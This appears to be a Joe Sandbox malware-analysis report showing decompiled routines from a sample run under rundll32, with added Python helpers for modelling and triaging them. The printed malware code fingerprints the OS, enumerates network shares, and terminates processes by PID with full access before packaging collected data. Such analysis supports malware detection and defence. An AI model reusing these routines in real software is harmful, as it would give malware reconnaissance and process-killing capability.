                                                            						_t68 = _v16;
                                                            						L046553C0(_t68 + 0x8c);
                                                            						DeleteCriticalSection(_t68 + 0x6c);
                                                            						DeleteCriticalSection(_t68 + 0x54);
                                                            						HeapFree( *( *_t68), 0, _t68);
                                                            						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                            						asm("sbb ebx, ebx");
                                                            						_t67 =  ~_t38 + 1;
                                                            						if(_t67 == 0) {
                                                            							goto L24;
                                                            						} else {
                                                            							_t82 = _v8;
                                                            							goto L12;
                                                            						}
                                                            						L22:
                                                            						if(_t67 == 0) {
                                                            							goto L24;
                                                            						}
                                                            						L23:
                                                            						 *_t88 = 0;
                                                            						return _t38;
                                                            					}
                                                            				}
                                                            				if(InterlockedCompareExchange(__ecx, 1, 0) == 0) {
                                                            					while(1) {
                                                            						L3:
                                                            						_t38 = _t88[2];
                                                            						_t71 =  *(_t38 + 4);
                                                            						if(_t71 == 0) {
                                                            							goto L23;
                                                            						}
                                                            						_t72 =  *_t71;
                                                            						_t88[2] =  *(_t88[2] + 4);
                                                            						InterlockedDecrement( &(_t88[1]));
                                                            						_push(8);
                                                            						E04655B47(_t88[2]);
                                                            						_t89 = _t89 + 8;
                                                            						L046553C0(_t72 + 0x8c);
                                                            						DeleteCriticalSection(_t72 + 0x6c);
                                                            						DeleteCriticalSection(_t72 + 0x54);
                                                            						HeapFree( *( *_t72), 0, _t72);
                                                            					}
                                                            					goto L23;
                                                            				} else {
                                                            					goto L2;
                                                            				}
                                                            				do {
                                                            					L2:
                                                            					asm("pause");
                                                            				} while (InterlockedCompareExchange(_t88, 1, 0) != 0);
                                                            				goto L3;
                                                            			}
                                                            0x0465588e
                                                            0x00000000

                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0465587F
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0465588C
                                                            • InterlockedDecrement.KERNEL32(?), ref: 046558AF
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 046558D1
                                                            • RtlDeleteCriticalSection.NTDLL(00000000), ref: 046558DB
                                                            • HeapFree.KERNEL32(?,00000000,?), ref: 046558E6
                                                            • timeGetTime.WINMM ref: 04655922
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0465594F
                                                            • timeGetTime.WINMM ref: 04655971
                                                            • timeGetTime.WINMM ref: 04655980
                                                            • InterlockedDecrement.KERNEL32(00000000), ref: 046559B3
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 046559E2
                                                            • RtlDeleteCriticalSection.NTDLL(00000000), ref: 046559EC
                                                            • HeapFree.KERNEL32(?,00000000,?), ref: 046559F7
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04655A02
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$CompareCriticalDeleteExchangeSection$Timetime$DecrementFreeHeap
                                                            • String ID:
                                                            • API String ID: 517897276-0
                                                            • Opcode ID: ef54d8267ea0996c612912bc48be154208dc6a9aeefe2eb241749edb6db0d8ab
                                                            • Instruction ID: 260733d1c90920ee72217c24b5efc6e5610e22395309b6cd494cdec45a269599
                                                            • Opcode Fuzzy Hash: ef54d8267ea0996c612912bc48be154208dc6a9aeefe2eb241749edb6db0d8ab
                                                            • Instruction Fuzzy Hash: 8A51BC31600305EBDB249FA5D8CCB59B7B9FF48310F148029EE4ADB2A4EB78B905CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E04645A50(intOrPtr* __ecx, void* __edi, void* __esi) {
                                                            				// OS fingerprint routine. Fills a 0x120-byte structure at __ecx:
                                                            				//   +0x00 major, +0x04 minor, +0x08 build, +0x0c platform id,
                                                            				//   +0x10 64-bit host flag, +0x14 result of E046459C0 on the current process,
                                                            				//   +0x18 SM_SERVERR2 (5.2 only), +0x1c server flag, +0x20 copy of szCSDVersion.
                                                            				signed int _v8;                      // /GS stack cookie
                                                            				char _v18;                           // OSVERSIONINFOEXW.wProductType (ebp-0x12c + 0x11a)
                                                            				struct _OSVERSIONINFOW _v300;        // typed as OSVERSIONINFOW by the decompiler, sized 0x11c = OSVERSIONINFOEXW
                                                            				signed int _v304;                    // RtlGetNtVersionNumbers: build (raw, with ntdll flag bits)
                                                            				char _v308;                          // RtlGetNtVersionNumbers: major
                                                            				char _v312;                          // RtlGetNtVersionNumbers: minor
                                                            				intOrPtr _v316;
                                                            				char _v348;                          // SYSTEM_INFO for GetNativeSystemInfo
                                                            				signed int _t45;
                                                            				_Unknown_base(*)()* _t49;
                                                            				intOrPtr _t50;
                                                            				intOrPtr _t57;
                                                            				_Unknown_base(*)()* _t61;
                                                            				intOrPtr _t65;
                                                            				signed int _t73;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t86;
                                                            				intOrPtr _t89;
                                                            				signed short* _t90;
                                                            				intOrPtr _t93;
                                                            				void* _t95;
                                                            				void* _t97;
                                                            				signed int _t98;
                                                            				intOrPtr* _t100;
                                                            				signed int _t101;
                                                            				void* _t118;
                                                            
                                                            				_t45 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t45 ^ _t101;                  // stack cookie, verified by E04655AFE on every return path
                                                            				_t100 = __ecx;
                                                            				E0465DEA0(__edi, __ecx, 0, 0x120);   // memset-style helper: zero the output structure
                                                            				_t97 = LoadLibraryA;
                                                            				// Resolved by name at run time, so the export does not show up in the import table.
                                                            				_t49 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                            				if(_t49 == 0) {
                                                            					L4:
                                                            					_t50 = 0;
                                                            				} else {
                                                            					asm("xorps xmm0, xmm0");         // zero the local SYSTEM_INFO
                                                            					_v316 = 0;
                                                            					asm("movups [ebp-0x158], xmm0");
                                                            					asm("movups [ebp-0x148], xmm0");
                                                            					 *_t49( &_v348);                 // GetNativeSystemInfo(&si): native arch even under WoW64
                                                            					_t76 = _v348;                    // si.wProcessorArchitecture
                                                            					if(_t76 == 6 || _t76 == 9) {     // PROCESSOR_ARCHITECTURE_IA64 / PROCESSOR_ARCHITECTURE_AMD64
                                                            						_t50 = 1;                    // 64-bit host
                                                            					} else {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            				 *((intOrPtr*)(_t100 + 0x10)) = _t50;
                                                            				 *((intOrPtr*)(_t100 + 0x14)) = E046459C0(GetCurrentProcess());   // helper over the own process handle (body not on this page)
                                                            				E0465DEA0(_t97,  &_v300, 0, 0x11c);
                                                            				_v300.dwOSVersionInfoSize = 0x11c;   // sizeof(OSVERSIONINFOEXW)
                                                            				if(GetVersionExW( &_v300) != 0) {
                                                            					_t89 = _v300.dwMajorVersion;
                                                            					_t93 = _v300.dwMinorVersion;
                                                            					 *(_t100 + 8) = _v300.dwBuildNumber;
                                                            					 *((intOrPtr*)(_t100 + 0xc)) = _v300.dwPlatformId;
                                                            					 *_t100 = _t89;
                                                            					 *((intOrPtr*)(_t100 + 4)) = _t93;
                                                            					 *(_t100 + 0x1c) = 0 | _v18 != 0x00000001;   // wProductType != VER_NT_WORKSTATION, i.e. a server SKU
                                                            					if(_t89 == 5 && _t93 == 2) {     // Server 2003 / XP x64: distinguish R2
                                                            						 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);   // SM_SERVERR2
                                                            					}
                                                            					// Copy the UTF-16 szCSDVersion string (service pack name) to +0x20, terminator included.
                                                            					_t90 =  &(_v300.szCSDVersion);
                                                            					_t23 = _t100 + 0x20; // 0x20
                                                            					_t95 = _t23 - _t90;                  // destination minus source offset
                                                            					do {
                                                            						_t73 =  *_t90 & 0x0000ffff;
                                                            						_t90 =  &(_t90[1]);
                                                            						 *(_t95 + _t90 - 2) = _t73;
                                                            					} while (_t73 != 0);
                                                            				}
                                                            				// GetVersionExW reports 6.2 to non-manifested processes on Windows 8.1 and later, so
                                                            				// when it says 6.2 (or failed, major == 0) the real version is taken from ntdll,
                                                            				// which is not subject to compatibility shims.
                                                            				_t57 =  *_t100;
                                                            				if(_t57 != 6 ||  *((intOrPtr*)(_t100 + 4)) != 2) {
                                                            					if(_t57 != 0) {
                                                            						goto L21;
                                                            					} else {
                                                            						goto L14;
                                                            					}
                                                            				} else {
                                                            					L14:
                                                            					_t61 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetNtVersionNumbers");
                                                            					if(_t61 == 0) {
                                                            						return E04655AFE(_v8 ^ _t101);
                                                            					} else {
                                                            						 *_t61( &_v308,  &_v312,  &_v304);   // RtlGetNtVersionNumbers(&major, &minor, &build)
                                                            						_t98 = _v304 & 0x0000ffff;           // strip the flag bits ntdll ORs into the build number
                                                            						_t92 =  *_t100;
                                                            						_t65 = _v308;
                                                            						_t86 = _v312;
                                                            						_v304 = _t98;
                                                            						_t118 = _t65 -  *_t100;
                                                            						// Only overwrite when ntdll reports a newer (major, minor) than GetVersionExW did.
                                                            						if(_t118 > 0 || _t118 == 0 && _t86 >  *((intOrPtr*)(_t100 + 4))) {
                                                            							 *_t100 = _t65;
                                                            							 *((intOrPtr*)(_t100 + 4)) = _t86;
                                                            							 *(_t100 + 8) = _t98;
                                                            							 *(_t100 + 0x1c) = 0 | E046458B0(_t92, _t98) != 0x00000000;   // server flag recomputed by a helper (body not on this page)
                                                            							if( *_t100 == 5 &&  *((intOrPtr*)(_t100 + 4)) == 2) {
                                                            								 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);   // SM_SERVERR2
                                                            							}
                                                            						}
                                                            						L21:
                                                            						return E04655AFE(_v8 ^ _t101);
                                                            					}
                                                            				}
                                                            			}
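The decompiled routine above is hard to read because of the decompiler's register names. The following is an added example, written for this page and not code from the sample or from Joe Sandbox: a Python model of the same decision logic (documented API first, ntdll!RtlGetNtVersionNumbers as the fallback when the documented API reports 6.2 or fails, build number masked, server and R2 flags derived as the sample does), so the behaviour can be exercised with constructed inputs. The field names, the input tuples and the `server_flag_from_build` callback (which stands in for the helper E046458B0, whose body is not on this page) are this model's own assumptions; the numeric constants are the documented Windows values the sample compares against.

```python
# Added example: a Python model of the version resolution in E04645A50.
# Not code from the sample or the report; inputs are constructed tuples.
from dataclasses import dataclass
from typing import Callable, Optional, Tuple

VER_NT_WORKSTATION = 1            # OSVERSIONINFOEXW.wProductType for client SKUs
PROCESSOR_ARCHITECTURE_IA64 = 6   # SYSTEM_INFO.wProcessorArchitecture values the
PROCESSOR_ARCHITECTURE_AMD64 = 9  # sample accepts as "64-bit host"


@dataclass
class OsInfo:
    """Mirrors the fields the sample stores at __ecx+0x00 .. +0x1c."""
    major: int = 0           # +0x00
    minor: int = 0           # +0x04
    build: int = 0           # +0x08
    platform_id: int = 0     # +0x0c
    is_64bit: bool = False   # +0x10  GetNativeSystemInfo arch is IA64 or AMD64
    server_r2: int = 0       # +0x18  GetSystemMetrics(SM_SERVERR2), only for 5.2
    is_server: bool = False  # +0x1c  wProductType != VER_NT_WORKSTATION


def resolve_os_version(
    get_version_ex: Optional[Tuple[int, int, int, int, int]],
    rtl_get_nt_version_numbers: Optional[Tuple[int, int, int]],
    processor_architecture: int,
    sm_serverr2: int = 0,
    server_flag_from_build: Callable[[int], bool] = lambda build: False,
) -> OsInfo:
    """get_version_ex: (dwMajor, dwMinor, dwBuild, dwPlatformId, wProductType) as
    GetVersionExW would fill them, or None if that call failed.
    rtl_get_nt_version_numbers: (major, minor, raw build) as returned by
    ntdll!RtlGetNtVersionNumbers, or None if the export could not be resolved.
    server_flag_from_build is an assumed stand-in for the helper E046458B0."""
    info = OsInfo(is_64bit=processor_architecture in
                  (PROCESSOR_ARCHITECTURE_IA64, PROCESSOR_ARCHITECTURE_AMD64))

    if get_version_ex is not None:
        major, minor, build, platform_id, product_type = get_version_ex
        info.major, info.minor, info.build, info.platform_id = major, minor, build, platform_id
        info.is_server = product_type != VER_NT_WORKSTATION
        if (major, minor) == (5, 2):           # Server 2003 / XP x64: R2 or not
            info.server_r2 = sm_serverr2

    # The sample only consults ntdll when the documented API reported 6.2 (what a
    # non-manifested process sees on Windows 8.1 and later) or nothing at all.
    if not ((info.major, info.minor) == (6, 2) or info.major == 0):
        return info
    if rtl_get_nt_version_numbers is None:
        return info

    major, minor, raw_build = rtl_get_nt_version_numbers
    build = raw_build & 0xFFFF                  # ntdll ORs flag bits into the top of the build number
    if (major, minor) > (info.major, info.minor):
        info.major, info.minor, info.build = major, minor, build
        info.is_server = server_flag_from_build(build)
        if (major, minor) == (5, 2):
            info.server_r2 = sm_serverr2
    return info


if __name__ == "__main__":
    # A non-manifested process on a Windows 10 x64 host: GetVersionExW lies (6.2),
    # RtlGetNtVersionNumbers tells the truth (10.0, build 19041 with flag bits set).
    print(resolve_os_version((6, 2, 9200, 2, 1), (10, 0, 0xF0004A61), 9))
```

The model keeps the sample's ordering deliberately: the ntdll result is only applied when it is strictly newer, so a host where both sources agree keeps the GetVersionExW build number and product type.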

                                                            Address column: per-line code addresses 0x04645a59 to 0x04645c3c for the listing above (the column was detached from its C-Code lines by extraction)

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04645A87
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645A8A
                                                            • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04645AD6
                                                            • GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04645B0D
                                                            • GetSystemMetrics.USER32(00000059), ref: 04645B52
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04645B9F
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645BA2
                                                            • GetSystemMetrics.USER32(00000059), ref: 04645C0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadMetricsProcSystem$CurrentProcessVersion
                                                            • String ID: GetNativeSystemInfo$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                            • API String ID: 3805471242-3094728150
                                                            • Opcode ID: 85147ef6a0dc5fae7a7bb03a75da69d4afdcdd2e9177bf47669c6b53879432ee
                                                            • Instruction ID: ec0c2200510a97a59105e2725a8ced057474271c91ac39659448d62283a610d8
                                                            • Opcode Fuzzy Hash: 85147ef6a0dc5fae7a7bb03a75da69d4afdcdd2e9177bf47669c6b53879432ee
                                                            • Instruction Fuzzy Hash: 6C514B70A00619EBDB34DF64C889BEAB7F4EF98314F10459DE94A97640FA74AAC4CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
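The "APIs" block of each function listing above is the most useful part for quick triage: it gives the call, the module, the stack slots at the call and the call address. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: a parser for those bullet lines, plus two checks a triager wants from them, decoding argument values that are known Windows constants and recovering the imports the code resolves at run time through LoadLibraryA and GetProcAddress. The sample listing embedded below is copied from the E04645A50 block above; the constant table holds documented Windows values (it also carries 0x1fffff and 0x40, which appear in the E0463DD30 code whose APIs block is not on this page); the function names are this example's own.

```python
# Added example: parse Joe Sandbox "APIs" lines and run two triage checks over them.
# Not part of the report. SAMPLE_LISTING is copied from the E04645A50 listing.
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Set, Tuple

SAMPLE_LISTING = """
• LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04645A87
• GetProcAddress.KERNEL32(00000000), ref: 04645A8A
• GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04645AD6
• GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04645B0D
• GetSystemMetrics.USER32(00000059), ref: 04645B52
• LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04645B9F
• GetProcAddress.KERNEL32(00000000), ref: 04645BA2
• GetSystemMetrics.USER32(00000059), ref: 04645C0D
"""

API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"        # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                       # optional (slot,slot,...)
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"     # ref: address of the call
)


class ApiCall(NamedTuple):
    name: str
    module: str
    args: Tuple[str, ...]   # stack slots as printed: hex values, strings, or "?"
    ref: int                # address of the call instruction


# (api name, argument index) -> {value: symbolic name}; documented Windows values.
NAMED_CONSTANTS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("GetSystemMetrics", 0): {0x59: "SM_SERVERR2"},
    ("OpenProcess", 0): {0x1FFFFF: "PROCESS_ALL_ACCESS"},
    ("LocalAlloc", 0): {0x40: "LPTR"},
}


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every bullet line of an APIs block; lines in another shape are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m is None:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
    return sorted(calls, key=lambda c: c.ref)      # address order, as the report prints them


def decode_constants(call: ApiCall) -> Dict[int, str]:
    """Map argument index -> symbolic name for arguments that are known constants."""
    decoded = {}
    for idx, raw in enumerate(call.args):
        table = NAMED_CONSTANTS.get((call.name, idx))
        if table and re.fullmatch(r"[0-9A-Fa-f]+", raw) and int(raw, 16) in table:
            decoded[idx] = table[int(raw, 16)]
    return decoded


def dynamic_imports(calls: List[ApiCall]) -> Set[Tuple[str, str]]:
    """Recover (dll, export) pairs from a LoadLibraryA entry immediately followed by
    GetProcAddress. The report prints raw stack slots, so for LoadLibraryA the second
    slot is the export name already pushed for the enclosing
    GetProcAddress(LoadLibraryA(dll), name) call, exactly as E04645A50 is compiled."""
    pairs = set()
    for a, b in zip(calls, calls[1:]):
        if a.name == "LoadLibraryA" and b.name == "GetProcAddress" and len(a.args) >= 2:
            pairs.add((a.args[0], a.args[1]))
    return pairs


def summarize(text: str) -> dict:
    """One-shot triage summary of an APIs block."""
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "modules": Counter(c.module for c in calls),
        "dynamic_imports": dynamic_imports(calls),
        "constants": {c.ref: decode_constants(c) for c in calls if decode_constants(c)},
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(summarize(SAMPLE_LISTING))
```

The dynamic-import check is the one worth keeping in a triage script: exports pulled by name from ntdll.dll, such as RtlGetNtVersionNumbers here, never appear in the PE import table, so the APIs block is often the only static-looking place where they are visible.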

                                                            C-Code - Quality: 56%
                                                            			E0463DD30(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                            				// __ecx: context object (+0x04 object handed to E04631C60, +0x0c mode selector).
                                                            				// _a4: array of DWORD process IDs, _a8: size of that array in bytes.
                                                            				intOrPtr _v8;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t19;
                                                            				void* _t20;
                                                            				int _t25;
                                                            				int _t32;
                                                            				void* _t40;
                                                            				void* _t42;
                                                            				void* _t44;
                                                            				void* _t49;
                                                            				void* _t53;
                                                            				void* _t57;
                                                            				intOrPtr _t64;
                                                            				void* _t67;
                                                            				void* _t71;
                                                            				void* _t74;
                                                            				// _t21 and _t28 below are the copy lengths; the decompiler did not recover them.
                                                            
                                                            				_push(__ecx);
                                                            				_t40 = _a8;
                                                            				_t64 = __ecx;
                                                            				_t57 = 0;
                                                            				_v8 = __ecx;
                                                            				if(_t40 != 0) {
                                                            					// Terminate every listed process. 0x1fffff is PROCESS_ALL_ACCESS; the handle is
                                                            					// never checked, so a PID the caller cannot open is silently skipped.
                                                            					do {
                                                            						_t74 = OpenProcess(0x1fffff, 0,  *(_t57 + _a4));
                                                            						TerminateProcess(_t74, 0);
                                                            						CloseHandle(_t74);
                                                            						_t57 = _t57 + 4;                 // next DWORD PID
                                                            					} while (_t57 < _t40);
                                                            					_t64 = _v8;
                                                            				}
                                                            				Sleep(0x64);                             // 100 ms, lets the terminations settle
                                                            				_t19 =  *((intOrPtr*)(_t64 + 0xc));      // mode selector: 2, 3 or anything else
                                                            				if(_t19 != 2) {
                                                            					__eflags = _t19 - 3;
                                                            					if(__eflags != 0) {
                                                            						_t20 = L0463DB90(_t64, __eflags);    // any other mode: result returned as-is
                                                            						goto L10;
                                                            					} else {
                                                            						_t20 = E0463D980(_t57, _t64);        // mode 3: collector returning a LocalAlloc'd buffer
                                                            						_a8 = _t20;
                                                            						__eflags = _t20;
                                                            						if(_t20 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							// Re-pack the collected data behind a one-byte type tag (0x8e).
                                                            							_t14 = LocalSize(_t20) + 1; // 0x1
                                                            							_t42 = LocalAlloc(0x40, _t14);   // LPTR: fixed, zero-initialised
                                                            							_t67 = _a8;
                                                            							_t16 = _t42 + 1; // 0x1
                                                            							_t49 = _t16;
                                                            							 *_t42 = 0x8e;
                                                            							E0465E060(_t49, _t67, _t21);     // memcpy-style helper: payload after the tag
                                                            							LocalFree(_t67);
                                                            							_t25 = LocalSize(_t42);
                                                            							_push(_t49);
                                                            							_push(0x3f);
                                                            							_push(_t25);
                                                            							_push(_t42);
                                                            							E04631C60( *((intOrPtr*)(_v8 + 4)));   // hand (buffer, size, 0x3f, payload) to the object at +0x04 (body not on this page)
                                                            							return LocalFree(_t42);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t20 = E0463D570(_t57, _t64);            // mode 2: different collector, same packaging below
                                                            					_a8 = _t20;
                                                            					if(_t20 == 0) {
                                                            						L10:
                                                            						return _t20;
                                                            					} else {
                                                            						_t8 = LocalSize(_t20) + 1; // 0x1
                                                            						_t44 = LocalAlloc(0x40, _t8);        // LPTR
                                                            						_t71 = _a8;
                                                            						_t10 = _t44 + 1; // 0x1
                                                            						_t53 = _t10;
                                                            						 *_t44 = 0x8e;                       // same type tag as the mode 3 path
                                                            						E0465E060(_t53, _t71, _t28);
                                                            						LocalFree(_t71);
                                                            						_t32 = LocalSize(_t44);
                                                            						_push(_t53);
                                                            						_push(0x3f);
                                                            						_push(_t32);
                                                            						_push(_t44);
                                                            						E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            						return LocalFree(_t44);
                                                            					}
                                                            				}
                                                            			}


                                                            APIs
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,0463D47D,?,?), ref: 0463DD52
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0463D47D,?,?), ref: 0463DD5D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,0463D47D,?,?), ref: 0463DD64
                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,0463D47D,?,?), ref: 0463DD76
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DD9B
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D47D,?,?), ref: 0463DDA5
                                                            • LocalFree.KERNEL32(?), ref: 0463DDC8
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DDCB
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DDDE
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DE01
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D47D,?,?), ref: 0463DE0B
                                                            • LocalFree.KERNEL32(?), ref: 0463DE2E
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DE31
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DE44
                                                              • Part of subcall function 0463DB90: LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0463DBDE
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC00
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC1E
                                                              • Part of subcall function 0463DB90: LocalSize.KERNEL32(00000000), ref: 0463DC25
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0463DC3C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Free$Size$Alloc$Process$CloseHandleOpenSleepTerminate
                                                            • String ID:
                                                            • API String ID: 363554170-0
                                                            • Opcode ID: 0b033c7a7830bcce0ac6095d3349074b6679de2c0b9caa53ccde4d53c9a91f7f
                                                            • Instruction ID: 2c3a69c423752f9fddf880cdde393b266ae35f92f91f1b4f4d045aea7ab4916a
                                                            • Opcode Fuzzy Hash: 0b033c7a7830bcce0ac6095d3349074b6679de2c0b9caa53ccde4d53c9a91f7f
                                                            • Instruction Fuzzy Hash: D931F572600218BBD714AFA5DC44DAAB7ADEF59321F04425AFA09D7240EF75BD00CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046347A0() {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				void* _v16;
                                                            				int _v20;
                                                            				int _v24;
                                                            				void* _v28;
                                                            				void* _t35;
                                                            				int _t38;
                                                            				int _t45;
                                                            				signed int* _t48;
                                                            				signed int _t49;
                                                            				int _t51;
                                                            				long _t57;
                                                            				signed int _t59;
                                                            				WCHAR* _t60;
                                                            				void* _t62;
                                                            				WCHAR** _t66;
                                                            				void* _t70;
                                                            
                                                            				_v20 = 0x4000;
                                                            				_t57 = 0;
                                                            				_v12 = 0xffffffff;
                                                            				_v16 = 0;
                                                            				if(WNetOpenEnumW(1, 1, 0, 0,  &_v16) == 0) {
                                                            					_v8 = LocalAlloc(0x40, 0x400);
                                                            					_t35 = LocalAlloc(0x40, _v20);
                                                            					_t62 = _t35;
                                                            					_v28 = _t62;
                                                            					if(_t62 != 0) {
                                                            						_t70 = _v8;
                                                            						while(1) {
                                                            							_t38 = WNetEnumResourceW(_v16,  &_v12, _t62,  &_v20);
                                                            							if(_t38 != 0) {
                                                            								break;
                                                            							}
                                                            							_v24 = _t38;
                                                            							if(_v12 > _t38) {
                                                            								_t66 = _t62 + 0x14;
                                                            								do {
                                                            									_t45 = lstrlenW( *_t66);
                                                            									if(_t57 + (_t45 + 1) * 2 <= LocalSize(_v8)) {
                                                            										_t70 = _v8;
                                                            									} else {
                                                            										_t70 = LocalReAlloc(_v8, _t57 + (lstrlenW( *_t66) + 1) * 2, 0x42);
                                                            										_v8 = _t70;
                                                            									}
                                                            									_t60 =  *_t66;
                                                            									_t48 = _t70 + _t57;
                                                            									do {
                                                            										_t59 =  *_t60 & 0x0000ffff;
                                                            										_t60 =  &(_t60[1]);
                                                            										 *_t48 = _t59;
                                                            										_t48 =  &(_t48[0]);
                                                            									} while (_t59 != 0);
                                                            									_t49 = lstrlenW( *_t66);
                                                            									_t66 =  &(_t66[8]);
                                                            									_t51 = _v24 + 1;
                                                            									_t57 = _t57 + _t49 * 2 + 2;
                                                            									_v24 = _t51;
                                                            								} while (_t51 < _v12);
                                                            								_t62 = _v28;
                                                            							}
                                                            						}
                                                            						LocalFree(_t62);
                                                            						WNetCloseEnum(_v16);
                                                            						if(_t70 == 0) {
                                                            							L19:
                                                            							return _t70;
                                                            						} else {
                                                            							if(_t57 >= 1) {
                                                            								_t70 = LocalReAlloc(_t70, _t57, 0x42);
                                                            								goto L19;
                                                            							} else {
                                                            								LocalFree(_t70);
                                                            								return 0;
                                                            							}
                                                            						}
                                                            					} else {
                                                            						return _t35;
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}


                                                            APIs
                                                            • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 046347C4
                                                            • LocalAlloc.KERNEL32(00000040,00000400,74CB69A0,?), ref: 046347E4
                                                            • LocalAlloc.KERNEL32(00000040,00004000), ref: 046347EE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocLocal$EnumOpen
                                                            • String ID:
                                                            • API String ID: 2229625058-0
                                                            • Opcode ID: ed22459b25ab1250da1e01999d5b11c8499a21b1303b0328d0f7dbcebb03576e
                                                            • Instruction ID: 242f3e4c74a42844f46185722feca8577ccccbb4a506f01ca6a711911b892612
                                                            • Opcode Fuzzy Hash: ed22459b25ab1250da1e01999d5b11c8499a21b1303b0328d0f7dbcebb03576e
